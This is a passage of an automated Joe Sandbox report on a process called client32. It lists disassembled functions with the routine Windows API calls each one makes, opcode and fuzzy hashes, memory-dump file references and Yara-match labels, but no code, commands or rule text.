                                                                                                                                                                                                    • Opcode ID: 045b0a910df906f647033cf6f86075e5ea6c3d6d2e1d9b3d8c151f3dfdd204cc
                                                                                                                                                                                                    • Instruction ID: 460b63ceb136a055cb04312f44383bb8d9651ef64d988a6b12a47e6aec4ca511
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 045b0a910df906f647033cf6f86075e5ea6c3d6d2e1d9b3d8c151f3dfdd204cc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 59310431A042C6EFDB42DF64CD80AAEBFB5FF01315F168569E4658B291E731DA80CB91
                                                                                                                                                                                                    Function 110A72F0 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 110A7319
                                                                                                                                                                                                    • CreateRectRgn.GDI32(?,?,?,?), ref: 110A737B
                                                                                                                                                                                                    • CombineRgn.GDI32(00000000,00000000,00000000,00000002), ref: 110A7388
                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 110A738F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateRect$CombineDeleteObject
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1735589438-0
                                                                                                                                                                                                    • Opcode ID: 45fb47227f938c3ac32ba62ad7cea327fe5f4bc887be3da3503991b144b35159
                                                                                                                                                                                                    • Instruction ID: 7c55b913b2b2c5e9ceebf247f0e200ebac5932dc0e21f1d57c3ddac5f96fd2c0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 45fb47227f938c3ac32ba62ad7cea327fe5f4bc887be3da3503991b144b35159
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F219236A00119ABCB04DBA9D884CBFB7BAEFC9710711C199FA46D3254E6309D42D7E1
                                                                                                                                                                                                    Function 110CD2A0 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 110CCA10: EnterCriticalSection.KERNEL32(00000000,00000000,24DE4E77,?,?,?,24DE4E77), ref: 110CCA4A
                                                                                                                                                                                                      • Part of subcall function 110CCA10: LeaveCriticalSection.KERNEL32(00000000,?,?,?,24DE4E77), ref: 110CCAB2
                                                                                                                                                                                                    • IsWindow.USER32(?), ref: 110CD2FB
                                                                                                                                                                                                      • Part of subcall function 110CAFC0: GetCurrentThreadId.KERNEL32 ref: 110CAFC9
                                                                                                                                                                                                    • RemovePropA.USER32(?), ref: 110CD328
                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 110CD33C
                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 110CD346
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalDeleteObjectSection$CurrentEnterLeavePropRemoveThreadWindow
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3515130325-0
                                                                                                                                                                                                    • Opcode ID: dfaa25823bd437af00b48b9cb039003f0fe96ea0139f721f484334f7840a211f
                                                                                                                                                                                                    • Instruction ID: 1912d5f7d6517959c15795f1203ad34c6d2ee6b6a386a3d84c59d9fd341526e4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: dfaa25823bd437af00b48b9cb039003f0fe96ea0139f721f484334f7840a211f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 57214BB5E007559BDB20DF69D844B5FFBE8AB44B18F004A6DE86297680D774E440CB90
                                                                                                                                                                                                    Function 11063510 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindWindowA.USER32(?,00000000), ref: 1106352E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FindWindow
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 134000473-0
                                                                                                                                                                                                    • Opcode ID: 8265c7733af96d4dda88c0ddade548804898b919ac610bc4d1eb58f025c4b91a
                                                                                                                                                                                                    • Instruction ID: e8329917378a6b87ca437673dd5b043a6dbca1648499038e9eb5cae08ecf1174
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8265c7733af96d4dda88c0ddade548804898b919ac610bc4d1eb58f025c4b91a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5521A675E4122DABD750CF58E885BDEF7F4EB49314F1041E9EA0997281DB30AA44CBD0
                                                                                                                                                                                                    Function 6882C9DF Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _mbspbrk.MSVCR100(?,6882CA98,?,00000000,6882BEF8,?,?,?,?,?,?,68807432), ref: 6882CA03
                                                                                                                                                                                                    • _match.LIBCMT ref: 6882CA10
                                                                                                                                                                                                    • _calloc_crt.MSVCR100(00000004,00000002,?,00000000,6882BEF8,?,?,?,?,?,?,68807432), ref: 6882CA44
                                                                                                                                                                                                    • free.MSVCR100(?,?,00000000,6882BEF8,?,?,?,?,?,?,68807432), ref: 6882CA80
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _calloc_crt_match_mbspbrkfree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 518297505-0
                                                                                                                                                                                                    • Opcode ID: 30dbefc289dc5bd369eb83f0b020363077feeea8642f3cdb54b46cd447b43c0b
                                                                                                                                                                                                    • Instruction ID: 2560498fe3d941a9a69e5a7e74a86e5085256e3b8f810f23382a4a2be2caf5c8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 30dbefc289dc5bd369eb83f0b020363077feeea8642f3cdb54b46cd447b43c0b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6111E4F6584911CFCB11CF1CCA60429B3E6EB8B7203A54D9AD56AD7652E630DCC1CBC0
                                                                                                                                                                                                    Function 110590DC Relevance: 6.1, APIs: 4, Instructions: 72timeCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • timeGetTime.WINMM ref: 110590FC
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 110591AA
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 110591C4
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 110591E9
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$Leave$EnterTimetime
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1178526778-0
                                                                                                                                                                                                    • Opcode ID: 5a3294d831c3680f41abea4f07c433e1b64d8288a9482612daab4534a2a8c4f2
                                                                                                                                                                                                    • Instruction ID: de64faa2bc893f0042d2db027e64659f3d2cecc70f566eade1ffbf0f13490889
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a3294d831c3680f41abea4f07c433e1b64d8288a9482612daab4534a2a8c4f2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85216B75E006269FCB84DFA8C8C496EF7B8FF497047008A6DE926D7604E730E910CBA0
                                                                                                                                                                                                    Function 1115F274 Relevance: 6.1, APIs: 4, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                                                    • Opcode ID: ec3c969e10003a4ab4fcd39709e582f3b98fac94c7fb781fbdef8f660fee8434
                                                                                                                                                                                                    • Instruction ID: 924decae14a629f733ede0bb622a477ce8d6e199e6b7b916e29b3dd74e49d163
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec3c969e10003a4ab4fcd39709e582f3b98fac94c7fb781fbdef8f660fee8434
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1811573E404317AFCBD22FB09944A6DFB9A9B423F8B214425F9298A140EF71D840CB92
                                                                                                                                                                                                    Function 68820B00 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • TlsSetValue.KERNEL32(?,?,?,?,?,68820A34,00000001,?,68820A54), ref: 68820B1E
                                                                                                                                                                                                    • QueryDepthSList.KERNEL32(00000148,?,?,?,?,68820A34,00000001,?,68820A54), ref: 68820B32
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,68820A34,00000001,?,68820A54), ref: 68820B54
                                                                                                                                                                                                    • InterlockedPushEntrySList.KERNEL32(00000148,-00000004,?,?,?,?,68820A34,00000001,?,68820A54), ref: 68820B6C
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: List$CloseDepthEntryHandleInterlockedPushQueryValue
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 94243546-0
                                                                                                                                                                                                    • Opcode ID: 98dbda9285b1f8cb6f6b7059f9cb2dcb525967ac6857cf1b726b77a45fa7b035
                                                                                                                                                                                                    • Instruction ID: 0e1d0f0b5d0d8ffb09a2e1e1952a671de519b16a467e46e7820349be7dcce302
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 98dbda9285b1f8cb6f6b7059f9cb2dcb525967ac6857cf1b726b77a45fa7b035
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C621C975900610DBDB20DF64D868B9E77F8AF41319F440869E99AD7151CF74D944CBA0
                                                                                                                                                                                                    Function 00401020 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCommandLineA.KERNEL32 ref: 00401024
                                                                                                                                                                                                    • GetStartupInfoA.KERNEL32(?), ref: 00401079
                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,0000000A), ref: 0040109C
                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 004010A9
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4094618180.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4094591498.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4094652158.0000000000403000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4094673945.0000000000404000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2164999147-0
                                                                                                                                                                                                    • Opcode ID: 14085ec075f93681cd44e9da420e50c529999ece7765cc5c856b362def1b15a9
                                                                                                                                                                                                    • Instruction ID: f614a552efd759633e5898ba04cf1d4763a2e92f88735b9f7b762142f34247ec
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 14085ec075f93681cd44e9da420e50c529999ece7765cc5c856b362def1b15a9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC1182201083C19AEB311F248A847AB6F959F03745F14047AE8D677AA6D27E88C7862D
                                                                                                                                                                                                    Function 6882A955 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6882AB7A: GetCurrentThreadId.KERNEL32 ref: 6882ABA2
                                                                                                                                                                                                      • Part of subcall function 6882AB7A: swprintf.LIBCMT(?,00000401,[%d:%d:%d:%d(%d)] ,00000000,?,6882A924,?,?,000000F8), ref: 6882ABCC
                                                                                                                                                                                                      • Part of subcall function 6882AB7A: vswprintf_s.MSVCR100(00000401,00000401,?,?,?,00000002,?,6882A924,?,?,000000F8), ref: 6882ABEE
                                                                                                                                                                                                      • Part of subcall function 6882AB7A: _wcslen.LIBCMT(?,00000401,00000401,?,?,?,00000002,?,6882A924,?,?,000000F8), ref: 6882ABF4
                                                                                                                                                                                                    • _fwprintf.LIBCMT(68883048,?), ref: 6882A9A1
                                                                                                                                                                                                      • Part of subcall function 6883481C: _errno.MSVCR100(688348A8,0000000C,6882A812,?), ref: 68834838
                                                                                                                                                                                                      • Part of subcall function 6883481C: _invalid_parameter_noinfo.MSVCR100(688348A8,0000000C,6882A812,?), ref: 68834843
                                                                                                                                                                                                    • __aullrem.LIBCMT ref: 6882A9B8
                                                                                                                                                                                                    • fflush.MSVCR100(00000032,00000000), ref: 6882A9D5
                                                                                                                                                                                                      • Part of subcall function 687EEEF1: _lock_file.MSVCR100(?,687EEF38,0000000C), ref: 687EEF0B
                                                                                                                                                                                                      • Part of subcall function 687EEEF1: _fflush_nolock.MSVCR100(?,687EEF38,0000000C), ref: 687EEF17
                                                                                                                                                                                                    • OutputDebugStringW.KERNEL32(?), ref: 6882A9E4
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentDebugOutputStringThread__aullrem_errno_fflush_nolock_fwprintf_invalid_parameter_noinfo_lock_file_wcslenfflushswprintfvswprintf_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3120632072-0
                                                                                                                                                                                                    • Opcode ID: 656b0585659072eeca484be823eec17511422e0cef74be82d6ba6d7bf753a14b
                                                                                                                                                                                                    • Instruction ID: d09ddfebd104387db1bbbf141e32aac6d59310a5df83fbe2ca10b35e65b07ea7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 656b0585659072eeca484be823eec17511422e0cef74be82d6ba6d7bf753a14b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA11A5B1540209EFDF44DF69DD55A6D37B8FF06304F90445AE419A2050EF309E94CB94
                                                                                                                                                                                                    Function 68820A81 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 68820376: TlsGetValue.KERNEL32(68825BA3,?,00000000,?,68815C77,00000001), ref: 6882037C
                                                                                                                                                                                                    • Concurrency::unsupported_os::unsupported_os.LIBCMT(?,00000000,?,?,?,00000000), ref: 68820AA0
                                                                                                                                                                                                      • Part of subcall function 68818154: std::exception::exception.LIBCMT(00000000,00000000,?,?,68820AA5,?), ref: 68818168
                                                                                                                                                                                                    • _CxxThrowException.MSVCR100(?,68880D68,?,00000000,?,?,?,00000000), ref: 68820AAE
                                                                                                                                                                                                      • Part of subcall function 687F86E8: RaiseException.KERNEL32(?,?,6880F30F,?,?,?,?,?,6880F30F,?,687EC888,68888518), ref: 687F8727
                                                                                                                                                                                                    • TlsSetValue.KERNEL32(00000000), ref: 68820AC9
                                                                                                                                                                                                    • TlsSetValue.KERNEL32(00000000,?,?,?,00000000), ref: 68820AF4
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
